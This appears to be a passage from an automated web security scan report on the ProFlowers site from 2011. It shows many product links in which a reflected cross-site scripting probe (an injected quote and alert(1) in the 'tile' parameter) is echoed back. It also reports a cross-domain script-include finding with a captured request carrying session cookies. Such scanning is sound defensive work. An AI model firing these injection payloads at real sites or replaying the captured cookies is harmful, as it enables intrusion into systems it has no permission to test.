tp://products.proflowers.com/flowers/20-Blue-Iris-1806?viewpos=50&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/IRS20blue_gv11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="20 Blue Iris" border="0" /></a>
...[SNIP]...
k="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/20-Blue-Iris-1806?viewpos=50&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
roducts.proflowers.com/flowers/Spring-Spectacular-5543?viewpos=51&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQtruspec_pnk10_3_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Spring Spectacular" border="0" /></a>
...[SNIP]...
tMVTFreeVase=false" href="http://products.proflowers.com/flowers/Spring-Spectacular-5543?viewpos=51&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
roducts.proflowers.com/flowers/All-the-Frills-30003887?viewpos=52&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQlittleallthefrills_grn11_2_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="All the Frills" border="0" /></a>
...[SNIP]...
tMVTFreeVase=false" href="http://products.proflowers.com/flowers/All-the-Frills-30003887?viewpos=52&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
/products.proflowers.com/flowers/20-White-Tulips-41147?viewpos=53&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL24white_pnk11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="20 White Tulips" border="0" /></a>
...[SNIP]...
xitMVTFreeVase=false" href="http://products.proflowers.com/flowers/20-White-Tulips-41147?viewpos=53&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
wers.com/flowers/Fragrant-Stargazer-Lilies-for-Mom-749?viewpos=54&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYstargazer_pnk09_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Fragrant Stargazer Lilies for Mom" border="0" /></a>
...[SNIP]...
alse" href="http://products.proflowers.com/flowers/Fragrant-Stargazer-Lilies-for-Mom-749?viewpos=54&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
owers.com/flowers/Lily-of-the-Valley-Bulb-Garden-42773?viewpos=55&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLBlilyofvly_bluesquare11_PC1489_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Lily of the Valley Bulb Garden" border="0" /></a>
...[SNIP]...
false" href="http://products.proflowers.com/flowers/Lily-of-the-Valley-Bulb-Garden-42773?viewpos=55&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
oducts.proflowers.com/plants/Potted-Blue-Hydrangea-593?viewpos=56&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inhydblu_sqbsktgrn10_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Potted Blue Hydrangea" border="0" /></a>
...[SNIP]...
MVTFreeVase=false" href="http://products.proflowers.com/plants/Potted-Blue-Hydrangea-593?viewpos=56&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
roducts.proflowers.com/lilies/Sympathy-Lilies-30002099?viewpos=57&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYwhtories09_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Sympathy Lilies" border="0" /></a>
...[SNIP]...
tMVTFreeVase=false" href="http://products.proflowers.com/lilies/Sympathy-Lilies-30002099?viewpos=57&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
p://products.proflowers.com/tulips/Tulips-for-Mom-4811?viewpos=58&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL15assrt_sgv09_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Tulips for Mom" border="0" /></a>
...[SNIP]...
="exitMVTFreeVase=false" href="http://products.proflowers.com/tulips/Tulips-for-Mom-4811?viewpos=58&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
.proflowers.com/wine/Moms-Wine-Country-Picnic-30000036?viewpos=59&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GFB_11_CKNWPICNIC_WIN_SPR_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Mom&#39;s Wine Country Picnic" border="0" /></a>
...[SNIP]...
eVase=false" href="http://products.proflowers.com/wine/Moms-Wine-Country-Picnic-30000036?viewpos=59&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
flowers.com/roses/Two-Dozen-Assorted-Petite-Roses-4768?viewpos=60&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrtpet_grn10_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Two Dozen Assorted Petite Roses" border="0" /></a>
...[SNIP]...
e=false" href="http://products.proflowers.com/roses/Two-Dozen-Assorted-Petite-Roses-4768?viewpos=60&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
flowers.com/roses/One-Dozen-Long-Stemmed-Red-Roses-503?viewpos=61&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red50_rbye11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="One Dozen Long Stemmed Red Roses" border="0" /></a>
...[SNIP]...
e=false" href="http://products.proflowers.com/roses/One-Dozen-Long-Stemmed-Red-Roses-503?viewpos=61&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
s.proflowers.com/wine/Classic-Merlot-Gift-Box-30000084?viewpos=62&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WIN_CKNWVIVARED_ClassicMerlot_GEN_10_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Classic Merlot Gift Box" border="0" /></a>
...[SNIP]...
eeVase=false" href="http://products.proflowers.com/wine/Classic-Merlot-Gift-Box-30000084?viewpos=62&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
wers.com/orchids/Deluxe-Purple-Dendrobium-Orchids-8104?viewpos=63&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQ30orchpurp_purpletrmp11_USWeekly_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Deluxe Purple Dendrobium Orchids" border="0" /></a>
...[SNIP]...
alse" href="http://products.proflowers.com/orchids/Deluxe-Purple-Dendrobium-Orchids-8104?viewpos=63&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
ducts.proflowers.com/roses/Premium-Elegance-Roses-1118?viewpos=64&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PRMelegance_grnp10_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Premium Elegance Roses" border="0" /></a>
...[SNIP]...
VTFreeVase=false" href="http://products.proflowers.com/roses/Premium-Elegance-Roses-1118?viewpos=64&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
products.proflowers.com/flowers/Sunshiny-Days-30008371?viewpos=65&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQnewspringdays_grn10_3_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Sunshiny Days" border="0" /></a>
...[SNIP]...
itMVTFreeVase=false" href="http://products.proflowers.com/flowers/Sunshiny-Days-30008371?viewpos=65&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
wers.com/flowers/Roses-and-Carnations-for-Mom-30050115?viewpos=66&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringrosescarns_pnk11_catalog_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Roses and Carnations for Mom" border="0" /></a>
...[SNIP]...
alse" href="http://products.proflowers.com/flowers/Roses-and-Carnations-for-Mom-30050115?viewpos=66&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
ducts.proflowers.com/flowers/A-Mothers-Dreams-30050116?viewpos=67&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringmix11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="A Mother...s Dreams" border="0" /></a>
...[SNIP]...
VTFreeVase=false" href="http://products.proflowers.com/flowers/A-Mothers-Dreams-30050116?viewpos=67&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div id="PFCfooterRibbonImage"> <img class="Ribbon25Mil" border="0" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" border="0" /> </div>
...[SNIP]...
:emailInput" type="text" value="Enter Your Email Here" id="_ctl29_emailInput" class="textBox" onclick="javascript:this.value=&#39;&#39;;" onkeypress="return CaptureEnterInEmailEntry(footerClientID)" /><img onclick="SetEmailEntryUrl()" class="sch_smallGo" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Sign Up for Email Savings" width="17" height="18" border="0" /></div>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.prvd.com/Careers_Overview.aspx">CAREERS</a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.providecommerce.com/privacy.aspx">PRIVACY POLICY</a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.providecommerce.com/terms.aspx">TERMS OF USE</a>
...[SNIP]...
at least 7 days." border="0" onclick="exitMVTFreeVase=false" href="http://www.proflowers.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:61px;width:124px;"><img class="footerLogo_PFC" height="61px" width="124px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The freshest flowers, guaranteed to last at least 7 days." border="0" /></a> <a title="A wide selection of green and exotic plants, perfect for gift and home d..cor." border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.proplants.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:61px;width:117px;"><img class="footerLogo_PLA" height=61px width=117px class="footerLogo_PLA" height="61px" width="117px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="A wide selection of green and exotic plants, perfect for gift and home d..cor." border="0" /></a>
...[SNIP]...
rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.proflowers.com/international?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:61px;width:132px;"><img class="footerLogo_PFCint" height=61px width=132px class="footerLogo_PFCint" height="61px" width="132px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="International flower delivery" border="0" /></a> <a title="The place for unique and personalized gifts." border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.redenvelope.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:61px;width:156px;"><img class="footerLogo_RED" height=61px width=156px class="footerLogo_RED" height="61px" width="156px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The place for unique and personalized gifts." border="0" /></a> <a title="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.cherrymoonfarms.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:61px;width:170px;"><img class="footerLogo_CMF" height=61px width=170px class="footerLogo_CMF" height="61px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" /></a><a title="Unique personalized gifts for life...s special occasions." border="0" onclick="exitMVTFreeVase=false" href="http://www.personalcreations.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:61px;width:179px;"><img class="footerLogo_PCR" height=61px width=179px class="footerLogo_PCR" height="61px" width="179px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Unique personalized gifts for life...s special occasions." border="0" /></a> <a title="Gourmet hand-dipped berries, cookies and cakes." border="0" onclick="exitMVTFreeVase=false" href="http://www.berries.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:61px;width:89px;"><img class="footerLogo_SHB" height=61px width=89px class="footerLogo_SHB" height="61px" width="89px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Gourmet hand-dipped berries, cookies and cakes." border="0" /></a>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
horized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.* http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script><!--ooend--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script><script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<noscript><img src="http://link.mercent.com/image.ashx?merchantID=ProFlowers" style="display: none;"></noscript>
...[SNIP]...
</span> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/certona/resxclsa.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
17. Cross-domain script include  previous  next
There are 31 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

17.1. https://accounts.proflowers.com/CustomerLogin.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://accounts.proflowers.com
Path:   /CustomerLogin.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /CustomerLogin.aspx?Ref=HomeNoRef HTTP/1.1
Host: accounts.proflowers.com
Connection: keep-alive
Referer: https://accounts.proflowers.com/Default.aspx?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=tjb3lzavlroebrfrqg11rbq2; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; domain=.proflowers.com; expires=Mon, 09-May-2061 12:15:32 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:15:32 GMT
Content-Length: 60636

<link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_youraccount_styles.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https:
...[SNIP]...
<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/>


<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div style="margin:0px 0 5 0;"><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div class="searchBarBottom"><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
